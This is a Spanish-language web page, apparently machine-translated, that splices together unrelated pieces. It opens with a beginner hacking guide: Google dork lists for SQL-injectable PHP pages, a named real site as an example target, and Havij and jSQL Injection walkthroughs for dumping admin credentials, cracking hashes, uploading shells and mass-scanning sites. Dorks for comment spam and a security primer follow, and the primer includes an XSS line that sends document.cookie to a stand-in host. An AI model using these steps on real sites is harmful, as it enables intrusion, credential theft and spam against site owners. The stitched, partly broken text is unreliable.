Inurl php categoría var juegos. Instrucciones para usar jSQL Injection, una herramienta multifuncional para encontrar y explotar inyecciones de SQL en Kali Linux. Hashes de fuerza bruta con inyección jSQL

Entonces, ahora hablaré sobre cómo piratear algo sin un conocimiento especial de nada. Digo de inmediato, hay poco beneficio de esto, pero aún así.
Primero, necesita encontrar los sitios mismos. Para hacer esto, vaya a google.com y busque dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Preguntas-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_specttacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= I nurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:coleccionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= en url:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2. php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql. php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4? id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl: buscar.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: oferta.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

aquí hay un pequeño fragmento. Puedes usar el tuyo. Y así, encontramos el sitio. Por ejemplo http://www.vestitambov.ru/
A continuación, descargue este programa

**Contenido oculto: para ver este contenido oculto, el número de publicaciones debe ser 3 o más.**

Haga clic en Aceptar. Luego insertamos el sitio de la víctima.
Presionamos inicio. A continuación, estamos esperando los resultados.
Y así, el programa encontró una vulnerabilidad de SQL.

A continuación, descargue Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= pegue el enlace resultante allí. No explicaré cómo usar Havij y dónde descargarlo, no es difícil encontrarlo. Todo. Ha recibido los datos que necesita: la contraseña de administrador, y luego depende de su imaginación.

PD Este es mi primer intento de escribir algo. lo siento si esta mal

Ejecute el archivo descargado haciendo doble clic (es necesario tener una máquina virtual).

3. Anonimato al revisar el sitio en busca de inyecciones de SQL

Configuración de Tor y Privoxy en Kali Linux

[Sección en desarrollo]

Configuración de Tor y Privoxy en Windows

[Sección en desarrollo]

Configuración del proxy de inyección jSQL

[Sección en desarrollo]

4. Comprobación del sitio en busca de inyección SQL con jSQL Injection

Trabajar con el programa es extremadamente simple. Simplemente ingrese la dirección del sitio y presione ENTER.

La siguiente captura de pantalla muestra que el sitio es vulnerable a tres tipos de inyecciones SQL a la vez (la información sobre ellas se indica en la esquina inferior derecha). Al hacer clic en los nombres de las inyecciones, puede cambiar el método utilizado:

Además, ya hemos mostrado las bases de datos existentes.

Puedes ver el contenido de cada tabla:

Normalmente, la parte más interesante de las tablas son las credenciales de administrador.

Si tiene suerte y encontró los datos del administrador, entonces es demasiado pronto para alegrarse. También debe encontrar el panel de administración, donde ingresar estos datos.

5. Busque administradores con jSQL Injection

Para hacer esto, vaya a la siguiente pestaña. Aquí nos encontramos con una lista de posibles direcciones. Puede seleccionar una o más páginas para comprobar:

La conveniencia es que no necesita usar otros programas.

Desafortunadamente, no hay muchos programadores descuidados que almacenen contraseñas en texto claro. Muy a menudo en la cadena de contraseña vemos algo como

8743b52063cd84097a65d1633f5c74f5

Esto es un hachís. Puedes descifrarlo con fuerza bruta. Y… jSQL Injection tiene un sistema de fuerza bruta incorporado.

6. Hashes de fuerza bruta con jSQL Injection

La conveniencia indudable es que no necesita buscar otros programas. Hay soporte para muchos de los hashes más populares.

Esta no es la mejor opción. Para convertirse en un gurú en el descifrado de hashes, se recomienda el libro "" en ruso.

Pero, por supuesto, cuando no hay otro programa a mano o no hay tiempo para estudiar, jSQL Injection con una función de fuerza bruta incorporada será útil.

Hay configuraciones: puede establecer qué caracteres se incluyen en la contraseña, el rango de longitud de la contraseña.

7. Operaciones de archivo después de la detección de inyección SQL

Además de las operaciones con bases de datos, leyéndolas y modificándolas, si se detectan inyecciones de SQL, se pueden realizar las siguientes operaciones con archivos:

  • leer archivos en el servidor
  • subir nuevos archivos al servidor
  • Subiendo shells al servidor

¡Y todo esto está implementado en jSQL Injection!

Existen limitaciones: el servidor SQL debe tener privilegios de archivo. Con administradores de sistema razonables, están deshabilitados y no se puede obtener acceso al sistema de archivos.

La presencia de privilegios de archivo es bastante fácil de verificar. Vaya a una de las pestañas (leer archivos, crear un shell, cargar un nuevo archivo) e intente realizar una de las operaciones indicadas.

Otra nota muy importante: necesitamos saber la ruta absoluta exacta al archivo con el que trabajaremos; de lo contrario, nada funcionará.

Mira la siguiente captura de pantalla:

Cualquier intento de operar sobre un archivo es respondido por: Sin privilegio de ARCHIVO(sin privilegios de archivo). Y aquí no se puede hacer nada.

Si en cambio tienes otro error:

Problema al escribir en [directory_name]

Esto significa que especificó incorrectamente la ruta absoluta donde desea escribir el archivo.

Para asumir una ruta absoluta, al menos se debe conocer el sistema operativo en el que se ejecuta el servidor. Para hacer esto, cambie a la pestaña Red.

Tal entrada (cadena Win64) nos da razones para suponer que estamos tratando con el sistema operativo Windows:

Keep-Alive: timeout=5, max=99 Servidor: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Conexión: Keep-Alive Método: HTTP/1.1 200 OK Longitud del contenido: 353 Fecha: viernes, 11 de diciembre de 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tipo de contenido: texto/html; conjunto de caracteres = UTF-8

Aquí tenemos algo de Unix (*BSD, Linux):

Codificación de transferencia: fragmentada Fecha: viernes, 11 de diciembre de 2015 11:57:02 GMT Método: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Desarrollado por: PHP/5.3.29 Servidor: Apache/2.2.31 (Unix)

Y aquí tenemos CentOS:

Método: HTTP/1.1 200 OK Caduca: jueves, 19 de noviembre de 1981 08:52:00 GMT Establecer-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; ruta=/ Conexión: keep-alive X-Cache-Lookup: MISS de t1.hoster.ru:6666 Servidor: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS de t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Fecha: viernes, 11 de diciembre de 2015 12:08:54 GMT Codificación de transferencia: tipo de contenido fragmentado: texto/html; conjunto de caracteres = WINDOWS-1251

En Windows, una carpeta de sitio típica es C:\Servidor\datos\htdocs\. Pero, de hecho, si alguien "pensó" en hacer un servidor en Windows, entonces, muy probablemente, esta persona no haya oído nada sobre los privilegios. Por tanto, deberías empezar a probar directamente desde el directorio C:/Windows/:

Como puedes ver, todo salió perfecto la primera vez.

Pero los propios shells de jSQL Injection plantean mis dudas. Si tiene privilegios de archivo, entonces puede cargar algo con una interfaz web.

8. Comprobación masiva de sitios para inyecciones de SQL

E incluso jSQL Injection tiene esta función. Todo es extremadamente simple: cargue una lista de sitios (se puede importar desde un archivo), seleccione aquellos que desea verificar y haga clic en el botón correspondiente para iniciar la operación.

Salida por inyección jSQL

jSQL Injection es una buena y poderosa herramienta para encontrar y luego usar las inyecciones de SQL que se encuentran en los sitios. Sus ventajas indudables: facilidad de uso, funciones relacionadas integradas. jSQL Injection puede ser el mejor amigo de un principiante cuando analiza sitios web.

De las deficiencias, señalaría la imposibilidad de editar bases de datos (al menos no encontré esta funcionalidad). Como ocurre con todas las herramientas con interfaz gráfica, la imposibilidad de uso en scripts puede atribuirse a las desventajas de este programa. Sin embargo, también es posible cierta automatización en este programa, gracias a la función integrada de verificación masiva del sitio.

jSQL Injection es mucho más conveniente de usar que sqlmap. Pero sqlmap admite más tipos de inyección de SQL, tiene opciones de firewall de archivos y algunas otras características.

En pocas palabras: jSQL Injection es el mejor amigo de un hacker principiante.

Puede encontrar ayuda para este programa en la Enciclopedia Kali Linux en esta página: http://kali.tools/?p=706

Cómo buscar usando google.com

Probablemente todos sepan cómo usar un motor de búsqueda como Google =) Pero no todos saben que si redacta correctamente una consulta de búsqueda utilizando estructuras especiales, puede lograr los resultados de lo que está buscando de manera mucho más eficiente y rápida =) En este artículo Intentaré mostrar eso y cómo debe hacerlo para buscar correctamente

Google admite varios operadores de búsqueda avanzada que tienen un significado especial cuando se busca en google.com. Por lo general, estos operadores modifican la búsqueda o incluso le dicen a Google que realice tipos de búsqueda completamente diferentes. Por ejemplo, la construcción Enlace: es un operador especial, y la consulta enlace: www.google.com no le dará una búsqueda normal, sino que encontrará todas las páginas web que tienen enlaces a google.com.
tipos de solicitudes alternativas

cache: Si incluye otras palabras en la consulta, Google resaltará esas palabras incluidas dentro del documento almacenado en caché.
Por ejemplo, caché: www.sitio web mostrará el contenido en caché con la palabra "web" resaltada.

Enlace: la consulta de búsqueda anterior mostrará páginas web que contienen enlaces a la consulta especificada.
Por ejemplo: enlace: www.sitio web mostrará todas las páginas que tienen un enlace a http://www.site

relacionado: Muestra páginas web que están "relacionadas" con la página web especificada.
Por ejemplo, relacionado: www.google.com mostrará una lista de páginas web que son similares a la página de inicio de Google.

información: Request Information: proporcionará alguna información que Google tiene sobre la página web solicitada.
Por ejemplo, información:sitio web mostrará información sobre nuestro foro =) (Armada - Foro de webmasters adultos).

Otras solicitudes de información

definir: La consulta define: proporcionará una definición de las palabras que escriba después de esto, compilada de varias fuentes en línea. La definición será para la frase completa ingresada (es decir, incluirá todas las palabras en la consulta exacta).

cepo: Si inicia una consulta con acciones: Google tratará el resto de los términos de la consulta como símbolos de cotización bursátil y vinculará a una página que muestra la información preparada para estos símbolos.
Por ejemplo, acciones: intel yahoo mostrará información sobre Intel y Yahoo. (Tenga en cuenta que debe imprimir los caracteres de las noticias de última hora, no el nombre de la empresa)

Solicitar modificadores

sitio: Si incluye site: en su consulta, Google limitará los resultados a los sitios web que encuentre en ese dominio.
También puede buscar zonas individuales, como ru, org, com, etc. ( sitio: com sitio:ru)

todo en el título: Si ejecuta una consulta con allintitle:, Google limitará los resultados con todas las palabras de consulta en el título.
Por ejemplo, allintitle: búsqueda en google devolverá todas las páginas de búsqueda de Google como imágenes, Blog, etc.

título: Si incluye intitle: en su consulta, Google restringirá los resultados a los documentos que contengan esa palabra en el título.
Por ejemplo, título:Negocio

allinurl: Si ejecuta una consulta con allinurl: Google limitará los resultados con todas las palabras de consulta en la URL.
Por ejemplo, allinurl: búsqueda en google devolverá documentos con google y buscará en el título. Además, como opción, puede separar las palabras con una barra inclinada (/), luego las palabras a ambos lados de la barra inclinada se buscarán dentro de la misma página: Ejemplo allinurl: foo/bar

inurl: Si incluye inurl: en su consulta, Google limitará los resultados a los documentos que contengan esa palabra en la URL.
Por ejemplo, Animación inurl:sitio web

en el texto: busca solo en el texto de la página la palabra especificada, ignorando el título y los textos de los enlaces, y otras cosas no relacionadas. También hay un derivado de este modificador: todo el texto: aquellos. Además, todas las palabras de la consulta se buscarán solo en el texto, lo que también es importante, ignorando las palabras de uso frecuente en los enlaces.
Por ejemplo, texto: foro

rango de fechas: búsquedas en marcos de tiempo (rango de fechas: 2452389-2452389), las fechas para el tiempo se especifican en formato juliano.

Bueno, y todo tipo de ejemplos interesantes de solicitudes.

Ejemplos de compilación de consultas para Google. Para los spammers

inurl:control.invitado?a=signo

Sitio:books.dreambook.com “URL de la página de inicio” “Firmar mi” inurl:firmar

Sitio: www.freegb.net Página de inicio

Inurl:sign.asp "Recuento de caracteres"

"Mensaje:" inurl:sign.cfm "Remitente:"

inurl:register.php “Registro de usuario” “Sitio web”

Inurl:edu/guestbook "Firmar el libro de visitas"

Inurl:post "Publicar comentario" "URL"

Inurl:/archives/ “Comentarios:” “¿Recordar información?”

“Guión y libro de visitas creado por:” “URL:” “Comentarios:”

inurl:?acción=añadir “phpBook” “URL”

Intitle:"Enviar nueva historia"

Revistas

inurl:www.livejournal.com/users/mode=reply

inurl greatjournal.com/mode=respuesta

Inurl:fastbb.ru/re.pl?

inurl: fastbb.ru /re.pl? "Libro de visitas"

blogs

Inurl:blogger.com/comment.g?”postID”"anónimo"

Inurl:typepad.com/ “Publicar un comentario” “¿Recordar información personal?”

Inurl:greatestjournal.com/community/ “Publicar comentario” “direcciones de posteadores anónimos”

“Publicar comentario” “direcciones de posteadores anónimos” -

Título: "Publicar comentario"

Inurl:pirillo.com “Publicar comentario”

Foros

Inurl:gate.html?”name=Foros” “modo=respuesta”

inurl:”foro/publicación.php?modo=respuesta”

inurl:”mes.php?”

inurl:”miembros.html”

inurl:foro/lista de miembros.php?”

Decidí hablar un poco sobre seguridad de la información. El artículo será útil para los programadores novatos y aquellos que acaban de empezar a hacer desarrollo Frontend. ¿Cuál es el problema?

Muchos desarrolladores novatos son tan adictos a escribir código que se olvidan por completo de la seguridad de su trabajo. Y lo más importante, se olvidan de vulnerabilidades como la consulta SQL, XXS. También crean contraseñas fáciles para sus paneles administrativos y están sujetos a la fuerza bruta. ¿Qué son estos ataques y cómo se pueden evitar?

inyección SQL

La inyección de SQL es el tipo más común de ataque a la base de datos que se lleva a cabo con una consulta SQL para un DBMS específico. Muchas personas e incluso grandes empresas sufren este tipo de ataques. La razón es el error de un desarrollador al escribir una base de datos y, de hecho, consultas SQL.

Un ataque de tipo inyección SQL es posible debido al procesamiento incorrecto de los datos de entrada utilizados en las consultas SQL. Con un ataque exitoso por parte de un pirata informático, corre el riesgo de perder no solo el contenido de las bases de datos, sino también las contraseñas y los registros del panel administrativo, respectivamente. Y estos datos serán suficientes para apoderarse por completo del sitio o realizar ajustes irreversibles en él.

El ataque se puede reproducir con éxito en scripts escritos en PHP, ASP, Perl y otros lenguajes. El éxito de este tipo de ataques depende más de qué DBMS se utilice y de cómo se implemente el escenario en sí. Hay muchos sitios vulnerables para inyecciones de SQL en el mundo. Esto es fácil de verificar. Es suficiente ingresar "idiotas": estas son solicitudes especiales para encontrar sitios vulnerables. Éstos son algunos de ellos:

  • inurl:index.php?id=
  • inurl:entrenadores.php?id=
  • inurl:comprar.php?categoría=
  • inurl:artículo.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:juegos.php?id=
  • inurl:página.php?archivo=
  • inurl:noticiasDetalle.php?id=
  • inurl:gallery.php?id=
  • inurl:artículo.php?id=

¿Cómo usarlos? Basta con ingresarlos en el motor de búsqueda de Google o Yandex. El motor de búsqueda le dará no solo un sitio vulnerable, sino también una página para esta vulnerabilidad. Pero no nos detendremos allí y nos aseguraremos de que la página sea realmente vulnerable. Para ello basta con poner una comilla simple “‘” después del valor “id=1”. Algo como esto:

  • inurl:juegos.php?id=1'

Y el sitio nos dará un error sobre la consulta SQL. ¿Qué necesita nuestro hacker a continuación?

Y luego necesita este mismo enlace a la página con un error. Luego, el trabajo sobre la vulnerabilidad en la mayoría de los casos se lleva a cabo en la distribución "Kali linux" con sus utilidades para esta parte: la introducción del código de inyección y la realización de las operaciones necesarias. Cómo sucederá esto, no puedo decírtelo. Pero puedes encontrar información sobre esto en Internet.

Ataque XSS

Este tipo de ataque se realiza sobre las cookies. Ellos, a su vez, son muy aficionados a salvar a los usuarios. ¿Por qué no? ¿Cómo sin ellos? Después de todo, gracias a las cookies, no ingresamos una contraseña de Vk.com o Mail.ru cien veces. Y son pocos los que las rechazan. Pero en Internet, a menudo aparece una regla para los piratas informáticos: el coeficiente de conveniencia es directamente proporcional al coeficiente de inseguridad.

Para implementar un ataque XSS, nuestro hacker necesita conocimientos de JavaScript. El lenguaje a primera vista es muy simple e inofensivo, ya que no tiene acceso a recursos informáticos. Un hacker puede trabajar con JavaScript solo en un navegador, pero eso es suficiente. Después de todo, lo principal es ingresar el código en la página web.

No entraré en detalles sobre el proceso de ataque. Diré solo los conceptos básicos y el significado de cómo sucede esto.

Un hacker puede agregar código JS a algún foro o libro de visitas:

Los scripts nos redirigen a una página infectada donde se ejecutará el código: ya sea un sniffer, algún tipo de almacenamiento o un exploit que de alguna manera robará nuestras Cookies del caché.

¿Por qué JavaScript? Porque JavaScript es excelente con las solicitudes web y tiene acceso a las cookies. Pero si nuestro script nos transferirá a algún sitio, entonces el usuario lo notará fácilmente. Aquí, el hacker usa una opción más astuta: simplemente ingresa el código en la imagen.

Img=nuevaImagen();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Simplemente creamos una imagen y le asignamos nuestro script como dirección.

¿Cómo protegerse de todo esto? Muy simple: no siga enlaces sospechosos.

Ataques DoS y DDos


DoS (del inglés Denial of Service - La denegación de servicio es un ataque de piratas informáticos a un sistema informático con el objetivo de hacerlo fallar. Esta es la creación de tales condiciones bajo las cuales los usuarios conscientes del sistema no pueden acceder a los recursos del sistema provistos (servidores), o este acceso es difícil. La falla del sistema también puede ser un paso hacia su captura si, en una emergencia, el software entrega información crítica: por ejemplo, la versión, parte del código del programa, etc. Pero la mayoría de las veces es una medida de economía. presión: la pérdida de un simple servicio que genera ingresos. Las facturas del proveedor o las medidas para evitar el ataque golpean significativamente el "objetivo" en el bolsillo Actualmente, los ataques DoS y DDoS son los más populares, ya que le permiten hacer que casi cualquier sistema falle sin dejar evidencia legalmente significativa.

¿Cuál es la diferencia entre los ataques DoS y DDos?

DoS es un ataque construido de manera inteligente. Por ejemplo, si el servidor no verifica la exactitud de los paquetes entrantes, un pirata informático puede realizar una solicitud de este tipo que se procesará para siempre y no habrá suficiente tiempo de procesador para trabajar con otras conexiones. En consecuencia, los clientes recibirán una denegación de servicio. Pero no funcionará sobrecargar o deshabilitar grandes sitios conocidos de esta manera. Están armados con canales bastante amplios y servidores súper poderosos que pueden hacer frente fácilmente a tal sobrecarga.

DDoS es en realidad el mismo ataque que DoS. Pero si en DoS hay un paquete de solicitud, entonces en DDoS puede haber cientos o más de ellos. Es posible que incluso los servidores pesados ​​no puedan hacer frente a tal sobrecarga. Te daré un ejemplo.

Un ataque DoS es cuando estás teniendo una conversación con alguien, pero luego aparece una persona mal educada y comienza a gritar en voz alta. Hablar es imposible o muy difícil. Solución: llamar a seguridad, que calmará y sacará a la persona de la habitación. Los ataques DDoS son cuando entran miles de personas maleducadas. En este caso, los guardias no podrán girar y llevarse a todos.

DoS y DDoS se producen desde ordenadores, los llamados zombis. Se trata de equipos de usuarios hackeados por piratas informáticos que ni siquiera sospechan que su máquina está involucrada en el ataque a algún servidor.

¿Cómo protegerse de esto? En general, de ninguna manera. Pero puede complicar la tarea de un hacker. Para hacer esto, debe elegir un buen alojamiento con servidores potentes.

Ataque de fuerza bruta

Un desarrollador puede idear muchos sistemas de protección contra ataques, revisar completamente los scripts que hemos escrito, revisar el sitio en busca de vulnerabilidades, etc. Pero cuando se trata del último paso del diseño del sitio, es decir, cuando simplemente coloca una contraseña en el panel de administración, puede olvidarse de una cosa. ¡Contraseña!

No se recomienda establecer una contraseña simple. Puede ser 12345, 1114457, vasya111, etc. No se recomienda establecer contraseñas de menos de 10-11 caracteres. De lo contrario, puede estar sujeto al ataque más común y no complejo: fuerza bruta.

La fuerza bruta es un ataque de fuerza bruta de contraseña basado en un diccionario que utiliza programas especiales. Los diccionarios pueden ser diferentes: latín, clasificados por números, digamos hasta cierto rango, mixtos (latín + números), e incluso hay diccionarios con símbolos únicos @#4$%&*~~`'”\ ? etc

Por supuesto, este tipo de ataque es fácil de evitar, basta con encontrar una contraseña compleja. Incluso el captcha puede salvarte. Y también, si su sitio está hecho en CMS, muchos de ellos calculan un tipo similar de ataque y bloquean ip. Siempre debemos recordar que cuantos más caracteres diferentes haya en la contraseña, más difícil será descifrarla.

¿Cómo funcionan los hackers? En la mayoría de los casos, sospechan o ya conocen parte de la contraseña. Es bastante lógico suponer que la contraseña del usuario ciertamente no constará de 3 o 5 caracteres. Tales contraseñas conducen a pirateos frecuentes. Básicamente, los piratas informáticos toman un rango de 5 a 10 caracteres y agregan algunos caracteres que probablemente conocen de antemano. A continuación, genere contraseñas con los rangos deseados. La distribución de Kali Linux incluso tiene programas para estos casos. Y listo, el ataque ya no durará mucho, ya que el volumen del diccionario ya no es tan grande. Además, un pirata informático puede usar el poder de la tarjeta de video. Algunos de ellos son compatibles con el sistema CUDA, mientras que la velocidad de enumeración aumenta hasta 10 veces. Y ahora vemos que un ataque de una forma tan sencilla es bastante real. Pero no solo los sitios están sujetos a la fuerza bruta.

Estimados desarrolladores, nunca se olviden del sistema de seguridad de la información, porque hoy en día muchas personas, incluidos los estados, sufren este tipo de ataques. Después de todo, la mayor vulnerabilidad es una persona que siempre puede distraerse en algún lugar o pasar por alto en algún lugar. Somos programadores, pero no máquinas programadas. ¡Esté siempre alerta, porque la pérdida de información amenaza con graves consecuencias!

 
Artículos sobre tema:
Clave de activación para NOD32 Internet Security y Smart Security
Las claves para ESET NOD32 Smart Security nos las proporciona ESET, por lo que oficialmente a partir de hoy no se pueden descargar por separado, ya que ESET ha cambiado la política de distribución de claves gratuitas. Ahora puedes descargar antivirus oficialmente
Cómo verificar las sumas de verificación de una imagen ISO Cómo calcular la suma hash de una carpeta
¿Alguna vez te has preguntado por qué indican información como "hash sum"? Muy a menudo se puede encontrar en torrents. Por un lado, alguna información incomprensible, pero por otro lado, muy útil. ¿Por qué? Trataré de describir en detalle cómo
Disk-Space: revisión, ganancias, herramientas para el trabajo.
El espacio en disco es un almacenamiento para varios archivos. Este repositorio está disponible para todos los usuarios con acceso a Internet. Sin embargo, pocas personas saben que este tema es excelente para ganar dinero. Sí, puedes conseguir buen dinero aquí, para ello necesitas
Inicio de sesión en línea de documentos de Google
El servicio multifuncional Google Docs, como puede suponer, es una creación de Google Corporation. Esta práctica y útil herramienta está disponible para todos los usuarios registrados de Google sin excepción. Puedes acceder al servicio desde cualquier dispositivo.